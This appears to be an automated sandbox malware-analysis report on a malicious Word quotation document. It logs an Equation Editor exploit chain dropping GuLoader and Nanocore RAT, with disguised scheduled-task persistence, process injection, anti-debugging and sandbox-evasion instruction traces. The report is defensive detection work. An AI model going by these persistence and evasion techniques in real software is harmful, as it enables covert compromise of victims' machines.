      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc | Virustotal: Detection: 39%
      Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc | ReversingLabs: Detection: 25%
      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
      Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknown | Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
      Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'
      Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
      Source: unknown | Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
      Source: unknown | Process created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
      Source: unknown | Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
      Source: C:\Users\Public\69577.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: C:\Users\Public\69577.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'
      Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
      Source: C:\Windows\System32\taskeng.exe | Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: .pdb< source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: ystem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb9FFP source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: !symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: System.pdb H~t source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: nWindows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: WT3UpC:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: < indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: < indows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb\cs source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: RegAsm.pdb source: smtpsvc.exe, smtpsvc.exe.6.dr
      Source: Binary string: !C:\Windows\System.pdb@= source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: Wm.pdb source: RegAsm.exe, 00000006.00000002.2383056342.00000000203CD000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: System.pdb8 source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: mscorrc.pdb source: RegAsm.exe, 00000006.00000002.2371259124.00000000000D0000.00000002.00000001.sdmp
      Source: Binary string: C:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_1E370FAA push ds; retn 0024h
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_1E370FF6 push ds; retn 0020h
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\69577.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created: C:\Users\user\subfolder1\filename1.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\69577.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, file created: C:\Users\Public\69577.exe (dropped file)
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown, process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key (4 occurrences)

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, file opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier, access: read attributes | delete
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, process information set: NOOPENFILEERRORBOX (31 consecutive occurrences)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (17 consecutive occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, process information set: NOOPENFILEERRORBOX (5 consecutive occurrences)
Source: C:\Users\Public\69577.exe, process information set: NOOPENFILEERRORBOX (7 consecutive occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, process information set: NOOPENFILEERRORBOX (74 consecutive occurrences)
Source: C:\Windows\SysWOW64\schtasks.exe, process information set: NOOPENFILEERRORBOX (8 consecutive occurrences)
Source: C:\Windows\System32\taskeng.exe, process information set: NOOPENFILEERRORBOX (4 consecutive occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, process information set: NOOPENFILEERRORBOX (22 consecutive occurrences)
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe, process information set: NOOPENFILEERRORBOX (23 consecutive occurrences)
Source: C:\Users\user\subfolder1\filename1.exe, process information set: NOOPENFILEERRORBOX (3 consecutive occurrences)
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe, process information set: NOOPENFILEERRORBOX (13 consecutive occurrences)

      Malware Analysis System Evasion:

      barindex
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 0000000000320136 second address: 0000000000320136 instructions:
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 000000000032497F second address: 000000000032497F instructions:
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000281951 second address: 0000000000281951 instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\Public\69577.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\69577.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: RegAsm.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 0000000000320136 second address: 0000000000320136 instructions:
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000003202DE second address: 000000000032038C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b jmp 00007FAD4C762412h 0x0000000d test edi, 48009A78h 0x00000013 push 00000000h 0x00000015 jmp 00007FAD4C762412h 0x00000017 test bx, ax 0x0000001a jmp 00007FAD4C762412h 0x0000001c pushad 0x0000001d mov eax, 000000E8h 0x00000022 cpuid 0x00000024 popad 0x00000025 jmp 00007FAD4C762412h 0x00000027 test bh, ah 0x00000029 push 7F21185Bh 0x0000002e jmp 00007FAD4C762412h 0x00000030 cmp dx, cx 0x00000033 jmp 00007FAD4C762412h 0x00000035 test ax, cx 0x00000038 jmp 00007FAD4C762412h 0x0000003a pushad 0x0000003b lfence 0x0000003e rdtsc
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 000000000032038C second address: 000000000032044C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push 3E17ADE6h 0x00000010 push F21FD920h 0x00000015 jmp 00007FAD4CBC69F2h 0x00000017 test edi, B4CD5B79h 0x0000001d jmp 00007FAD4CBC69F2h 0x0000001f test bx, ax 0x00000022 push 27AA3188h 0x00000027 jmp 00007FAD4CBC69F2h 0x00000029 pushad 0x0000002a mov eax, 00000097h 0x0000002f cpuid 0x00000031 popad 0x00000032 push DFCB8F12h 0x00000037 jmp 00007FAD4CBC69F2h 0x00000039 test bh, ah 0x0000003b push 2D9CC76Ch 0x00000040 jmp 00007FAD4CBC69F2h 0x00000042 cmp dx, cx 0x00000045 jmp 00007FAD4CBC69F2h 0x00000047 test ax, cx 0x0000004a jmp 00007FAD4CBC69F2h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000003205CA second address: 00000000003205F3 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov edx, 94CFDCC5h 0x00000011 jmp 00007FAD4C762412h 0x00000013 pushad 0x00000014 mov edi, 0000000Bh 0x00000019 rdtsc
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 000000000032497F second address: 000000000032497F instructions:
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 00000000002802DE second address: 000000000028038C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b jmp 00007FAD4C762412h 0x0000000d test edi, 48009A78h 0x00000013 push 00000000h 0x00000015 jmp 00007FAD4C762412h 0x00000017 test bx, ax 0x0000001a jmp 00007FAD4C762412h 0x0000001c pushad 0x0000001d mov eax, 000000E8h 0x00000022 cpuid 0x00000024 popad 0x00000025 jmp 00007FAD4C762412h 0x00000027 test bh, ah 0x00000029 push 7F21185Bh 0x0000002e jmp 00007FAD4C762412h 0x00000030 cmp dx, cx 0x00000033 jmp 00007FAD4C762412h 0x00000035 test ax, cx 0x00000038 jmp 00007FAD4C762412h 0x0000003a pushad 0x0000003b lfence 0x0000003e rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 000000000028038C second address: 000000000028044C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push 3E17ADE6h 0x00000010 push F21FD920h 0x00000015 jmp 00007FAD4CBC69F2h 0x00000017 test edi, B4CD5B79h 0x0000001d jmp 00007FAD4CBC69F2h 0x0000001f test bx, ax 0x00000022 push 27AA3188h 0x00000027 jmp 00007FAD4CBC69F2h 0x00000029 pushad 0x0000002a mov eax, 00000097h 0x0000002f cpuid 0x00000031 popad 0x00000032 push DFCB8F12h 0x00000037 jmp 00007FAD4CBC69F2h 0x00000039 test bh, ah 0x0000003b push 2D9CC76Ch 0x00000040 jmp 00007FAD4CBC69F2h 0x00000042 cmp dx, cx 0x00000045 jmp 00007FAD4CBC69F2h 0x00000047 test ax, cx 0x0000004a jmp 00007FAD4CBC69F2h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 00000000002805CA second address: 00000000002805F3 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov edx, 94CFDCC5h 0x00000011 jmp 00007FAD4C762412h 0x00000013 pushad 0x00000014 mov edi, 0000000Bh 0x00000019 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000281951 second address: 0000000000281951 instructions:
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000286AF8 second address: 0000000000286AF8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub ebx, esi 0x0000000d inc ebx 0x0000000e jne 00007FAD4C762418h 0x00000010 jmp 00007FAD4C762412h 0x00000012 test eax, 276D876Eh 0x00000017 mov byte ptr [edx+ecx], al 0x0000001a jmp 00007FAD4C762412h 0x0000001c test edx, eax 0x0000001e inc ecx 0x0000001f jne 00007FAD4C76238Eh 0x00000021 mov al, byte ptr [edx+ecx] 0x00000024 add ebx, esi 0x00000026 xor al, byte ptr [ebx] 0x00000028 jmp 00007FAD4C762412h 0x0000002a pushad 0x0000002b lfence 0x0000002e rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00284447 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2348 | Thread sleep time: -360000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2864 | Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2512 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 884 | Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\taskeng.exe TID: 2160 | Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2332 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2384 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007B11C2 GetSystemInfo,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\
      Source: RegAsm.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process information queried: ProcessInformation

      Anti Debugging:

      Hides threads from debuggers
      Source: C:\Users\Public\69577.exe | Thread information set: HideFromDebugger
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Thread information set: HideFromDebugger
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\69577.exe | Process queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00284447 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00284C64 LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00286C05 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00285D6F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00286BBA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_002857CD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process token adjusted: Debug
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      Writes to foreign memory regions
      Source: C:\Users\Public\69577.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 280000
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
      Source: C:\Users\Public\69577.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: C:\Users\Public\69577.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'
      Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
      Source: C:\Windows\System32\taskeng.exe | Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
      Source: RegAsm.exe, 00000006.00000002.2382730056.000000001E4ED000.00000004.00000001.sdmp | Binary or memory string: Program ManagerH
      Source: RegAsm.exe, 00000006.00000002.2382730056.000000001E4ED000.00000004.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371495935.00000000007E0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
      Source: RegAsm.exe, 00000006.00000002.2372409017.0000000001180000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371495935.00000000007E0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: RegAsm.exe, 00000006.00000002.2382511336.000000001DCBD000.00000004.00000001.sdmp | Binary or memory string: Program Manager (x86)\SMTP Service\smtpsvc.exe`
      Source: RegAsm.exe, 00000006.00000002.2372409017.0000000001180000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371495935.00000000007E0000.00000002.00000001.sdmp | Binary or memory string: !Progman
      Source: RegAsm.exe, 00000006.00000002.2382511336.000000001DCBD000.00000004.00000001.sdmp | Binary or memory string: Program Manager (x86)\SMTP Service\smtpsvc.exehS
      Source: RegAsm.exe, 00000006.00000002.2382730056.000000001E4ED000.00000004.00000001.sdmp | Binary or memory string: Program Manager<
      Source: C:\Users\Public\69577.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

      Stealing of Sensitive Information:

      Yara detected Nanocore RAT
      Source: Yara match | File source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
      Source: Yara match | File source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE

      Remote Access Functionality:

      Detected Nanocore Rat
      Source: RegAsm.exe, 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.C